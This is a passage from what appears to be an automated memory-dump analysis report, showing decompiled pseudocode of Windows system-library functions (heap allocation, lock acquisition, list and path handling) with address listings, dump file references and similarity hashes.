					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E033DD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E033B2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L033B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E033DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E033AFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x348b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E033DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x033c5142
0x033c514c
0x033c5150
0x033c5157
0x033c5159
0x033c515e
0x033c5165
0x033c5169
0x033c516c
0x033c5172
0x033c5176
0x033c517a
0x033c517a
0x033c517a
0x033c517f
0x03406d8b
0x03406d8e
0x03406d91
0x03406d95
0x03406d98
0x03406d9c
0x03406da0
0x03406da3
0x03406da7
0x03406e26
0x03406e26
0x03406e2a
0x033c51f9
0x033c51f9
0x033c51fe
0x03406e33
0x03406e33
0x03406e39
0x03406e3d
0x03406e46
0x03406e50
0x00000000
0x00000000
0x03406e52
0x03406e53
0x03406e56
0x03406e5d
0x00000000
0x00000000
0x00000000
0x03406e5f
0x03406e67
0x03406e77
0x03406e7f
0x03406e80
0x03406e88
0x03406e90
0x03406e9f
0x03406ea5
0x03406ea9
0x03406eb1
0x03406ebf
0x00000000
0x00000000
0x03406ecf
0x03406ed3
0x00000000
0x00000000
0x03406edb
0x03406ede
0x03406ee1
0x03406ee8
0x03406eeb
0x03406eed
0x03406ef0
0x03406ef4
0x03406ef8
0x03406efc
0x00000000
0x00000000
0x03406f0d
0x03406f11
0x03406f32
0x03406f37
0x03406f3b
0x03406f3e
0x03406f41
0x03406f46
0x00000000
0x00000000
0x03406f4c
0x03406f50
0x03406f50
0x03406f54
0x03406f62
0x03406f65
0x03406f6d
0x03406f7b
0x03406f7b
0x03406f93
0x03406f98
0x03406fa0
0x03406fa6
0x03406fb3
0x03406fb6
0x03406fbf
0x03406fc1
0x03406fd5
0x03406fda
0x03406fda
0x03406fdd
0x03406fe2
0x03406fe7
0x03406feb
0x03406fef
0x03406ff3
0x033c520c
0x033c520c
0x033c520f
0x033c5215
0x033c5234
0x033c523a
0x033c523a
0x033c5244
0x033c5245
0x033c5246
0x033c5251
0x033c5251
0x03406f13
0x03406f17
0x03406f17
0x03406f18
0x03406f1b
0x03406f1f
0x03406f23
0x00000000
0x03406f28
0x033c5204
0x033c5204
0x033c5208
0x00000000
0x033c5208
0x033c5185
0x033c5188
0x033c518a
0x033c518e
0x033c5195
0x03406db1
0x03406db5
0x03406db9
0x033c519b
0x033c519b
0x033c519e
0x033c51a7
0x033c51a9
0x033c51a9
0x033c51b5
0x033c51b8
0x033c51bb
0x033c51be
0x033c51c1
0x033c51c5
0x033c51c9
0x033c51cd
0x033c51cd
0x033c51d8
0x033c51dc
0x033c51e0
0x03406dcc
0x03406dd0
0x03406dd5
0x03406ddd
0x03406de1
0x03406de1
0x03406de5
0x03406deb
0x03406df1
0x03406df7
0x03406dfd
0x03406e01
0x03406e05
0x03406e09
0x03406e0d
0x03406e11
0x03406e11
0x033c51eb
0x03406e1a
0x03406e1f
0x03406e21
0x03406e23
0x00000000
0x033c51f1
0x033c51f1
0x00000000
0x033c51f1

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea492883abccc7498c99dab2ac62d832a834812cb6733e9f243d5d7db479010
Instruction ID: a3c8dad5ccf9962cd5c20212274b35391b0058ca69587fc96cb02ddce40f1b19
Opcode Fuzzy Hash: dea492883abccc7498c99dab2ac62d832a834812cb6733e9f243d5d7db479010
Instruction Fuzzy Hash: 8FC112756083808FD354CF28C580A5AFBE1FF89304F184A6EF89A9B392D775E945CB46

Uniqueness

Uniqueness Score: -1.00%

Function 033AEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E033AEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03399080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03392D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x033aef4b
0x033aef4d
0x033aef57
0x033af0bd
0x033af0c2
0x033af0d2
0x033af0d2
0x033af0c2
0x033aef5d
0x033aef5f
0x033aef67
0x033aef6a
0x033aef6d
0x033aef74
0x033aef7f
0x033aef82
0x033aef82
0x033aef86
0x033aef88
0x033aef8c
0x033aef8f
0x033aef8f
0x033aef8f
0x00000000
0x033aef91
0x033aef93
0x033aefc4
0x033aefc4
0x033aefc4
0x033aefca
0x033aefd0
0x033af0a6
0x00000000
0x00000000
0x033af0af
0x033fbb06
0x033fbb0a
0x033af0b5
0x033af0b5
0x033af0b5
0x033af0b5
0x00000000
0x033aefd6
0x033aefd9
0x033af0de
0x033af0e2
0x033aefdf
0x033aefdf
0x033aefdf
0x033aefe5
0x033fbafc
0x033fbafc
0x033aefe5
0x033aefeb
0x033aefed
0x033af00f
0x033af011
0x033af01a
0x033af01d
0x033af021
0x033af028
0x033af029
0x033af029
0x033af02c
0x00000000
0x033af02c
0x033aeff3
0x033aeff9
0x033af0ea
0x033af0ed
0x033af0ef
0x00000000
0x033af0ef
0x033af003
0x033fbb12
0x033af045
0x033af049
0x033af051
0x033af09e
0x033af0a0
0x033af0a0
0x033af09e
0x033af053
0x033af064
0x033af064
0x033af06b
0x033fbb1a
0x033fbb1a
0x033af071
0x033af071
0x033af07d
0x033af082
0x033af08f
0x033af08f
0x033af009
0x033af00d
0x00000000
0x033af00d
0x033aefd0
0x033aef97
0x033aefa5
0x033aefaa
0x00000000
0x033aefac
0x033aefac
0x033aefac
0x00000000
0x033aefb2
0x033af036
0x033af03a
0x033af040
0x033af090
0x00000000
0x033af092
0x033af042
0x00000000
0x033af042
0x033aefb7
0x033aefb9
0x033aefbc
0x033aefb0
0x033aefb0
0x00000000
0x033aefbe
0x033aefbe
0x033aefc1
0x00000000
0x033aefc1
0x033aefbc
0x033aefaa
0x033aef91

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 6b538c02f61a89fe8348b03399e3679de3032b6d84f0771e5ae4e1bc14ae953a
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 69512230E04A49EFDB24CB6CC8D07AEFBB5EF05314F1D82A8C55597281C37AA989D791

Uniqueness

Uniqueness Score: -1.00%

Function 0346740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0346740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E033ED4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E033DF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L033B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L033B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E033DF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L033B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0346740d
0x0346740d
0x03467412
0x03467413
0x03467416
0x03467418
0x0346741c
0x0346741f
0x03467422
0x03467422
0x03467428
0x0346742a
0x0346742a
0x03467451
0x03467432
0x0346744f
0x0346744f
0x00000000
0x03467434
0x03467438
0x03467443
0x03467517
0x03467517
0x0346751a
0x03467535
0x03467520
0x03467527
0x0346752c
0x03467531
0x03467533
0x00000000
0x03467533
0x00000000
0x03467531
0x0346754b
0x0346754f
0x0346755c
0x0346755c
0x0346755f
0x03467560
0x03467561
0x03467562
0x03467563
0x03467568
0x0346756a
0x0346756c
0x0346756d
0x0346756d
0x0346756f
0x03467572
0x03467574
0x03467577
0x0346757c
0x0346757f
0x00000000
0x03467551
0x03467551
0x03467551
0x03467553
0x03467553
0x03467449
0x03467449
0x0346744c
0x0346744c
0x00000000
0x0346744c
0x03467443
0x0346750e
0x03467514
0x03467514
0x03467455
0x03467469
0x0346746d
0x00000000
0x03467473
0x03467473
0x03467476
0x03467480
0x03467484
0x0346748e
0x03467493
0x03467493
0x03467496
0x03467499
0x034674a1
0x034674b1
0x034674b5
0x00000000
0x034674bb
0x034674c1
0x034674c1
0x034674c4
0x034674c5
0x034674c6
0x034674c7
0x034674c8
0x034674cd
0x00000000
0x034674d3
0x034674d3
0x034674d6
0x034674d8
0x034674db
0x034674dd
0x034674e0
0x034674e7
0x034674ee
0x034674ee
0x034674f4
0x034674f9
0x00000000
0x034674fb
0x034674fb
0x034674fd
0x03467500
0x03467503
0x03467505
0x03467505
0x034674f9
0x00000000
0x034674cd
0x034674b5
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 7061fc5f8bb85a7df7779d2d5da6a71b33e6aafe23ce0af855a949c26275fffb
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 89518E71600606EFDB15CF14C480A96FBB5FF45308F19C1EAE9089F612E371E946CB94

Uniqueness

Uniqueness Score: -1.00%

Function 033C4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E033C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x348d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E033DFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3487bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E033DB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L033B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0339CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E033DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E033DF380(_t67 + 0xc, 0x3375138, 0x10) == 0) {
								 *0x34860d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E033C4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E033C4E70(0x34886b0, 0x33c5690, 0, 0) != 0) {
					_t46 = E0339CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x033c4d3b
0x033c4d4d
0x033c4d53
0x033c4d58
0x033c4d65
0x033c4d6c
0x033c4d71
0x033c4d77
0x033c4d7f
0x033c4d8c
0x033c4d8e
0x033c4dad
0x033c4db0
0x033c4db7
0x033c4db8
0x033c4db9
0x033c4dba
0x033c4dbb
0x033c4dc1
0x033c4dc8
0x033c4dcc
0x033c4dd5
0x033c4dde
0x033c4ddf
0x033c4de0
0x033c4de1
0x033c4de6
0x033c4de7
0x033c4de9
0x033c4df3
0x00000000
0x00000000
0x03406c7c
0x03406c8a
0x03406c8a
0x03406c9d
0x03406ca7
0x03406cac
0x03406cb2
0x03406cb9
0x00000000
0x03406cbf
0x03406cbf
0x00000000
0x03406cbf
0x03406cb9
0x033c4dfb
0x03406ccf
0x03406cd3
0x033c4e32
0x033c4e39
0x03406ce0
0x03406cf2
0x03406cf2
0x03406ce0
0x033c4e3f
0x033c4e41
0x033c4e51
0x033c4e51
0x033c4e03
0x033c4e03
0x033c4e09
0x033c4e0f
0x033c4e57
0x00000000
0x00000000
0x033c4e1b
0x033c4e30
0x033c4e5b
0x033c4e5b
0x00000000
0x033c4e30
0x033c4e11
0x033c4e11
0x033c4e16
0x00000000
0x033c4e16
0x033c4e01
0x00000000
0x033c4e01
0x033c4da5
0x03406c6b
0x00000000
0x033c4dab
0x033c4dab
0x00000000
0x033c4dab

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371060739fa33d46421f7075417e0384b61db3b37b99d83d757921fffca87d31
Instruction ID: 0c493d1aa7feb19878d0d93053c4be18f5664308226f678b6d2b207f632ac358
Opcode Fuzzy Hash: 371060739fa33d46421f7075417e0384b61db3b37b99d83d757921fffca87d31
Instruction Fuzzy Hash: 71412275A403589FEB22EF25CCD0FAAB7A9EB45600F0600AEE9069F281D774DD40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 033D3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E033A7B60(0, _t61, 0x33711c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E033A7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L033B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x033d3d4c
0x033d3d50
0x033d3d55
0x033d3d5e
0x0340e79a
0x00000000
0x0340e79a
0x033d3d68
0x0340e789
0x033d3d9d
0x033d3da3
0x033d3daf
0x033d3db5
0x033d3dbc
0x033d3dc4
0x033d3dc9
0x033d3dce
0x0340e7ae
0x0340e7ae
0x033d3dde
0x033d3de2
0x033d3de7
0x033d3e0d
0x033d3e13
0x033d3e16
0x033d3e1e
0x033d3e25
0x033d3e28
0x00000000
0x00000000
0x033d3e2a
0x033d3e2f
0x033d3e37
0x033d3e37
0x00000000
0x033d3e37
0x033d3e31
0x00000000
0x033d3e31
